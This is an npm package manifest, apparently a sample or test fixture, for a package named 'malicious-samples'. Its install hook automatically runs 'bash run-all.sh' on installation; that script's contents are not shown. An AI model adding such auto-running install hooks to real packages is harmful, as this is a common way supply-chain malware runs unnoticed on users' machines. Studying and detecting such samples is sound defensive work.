{
  "name": "malicious-samples",
  "version": "1.0.0",
  "description": "some dummy package",
  "repoistory": "https://gitlab.com/some/repo",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "install": "bash run-all.sh" 
  },
  "author": "",
  "license": "ISC"
}
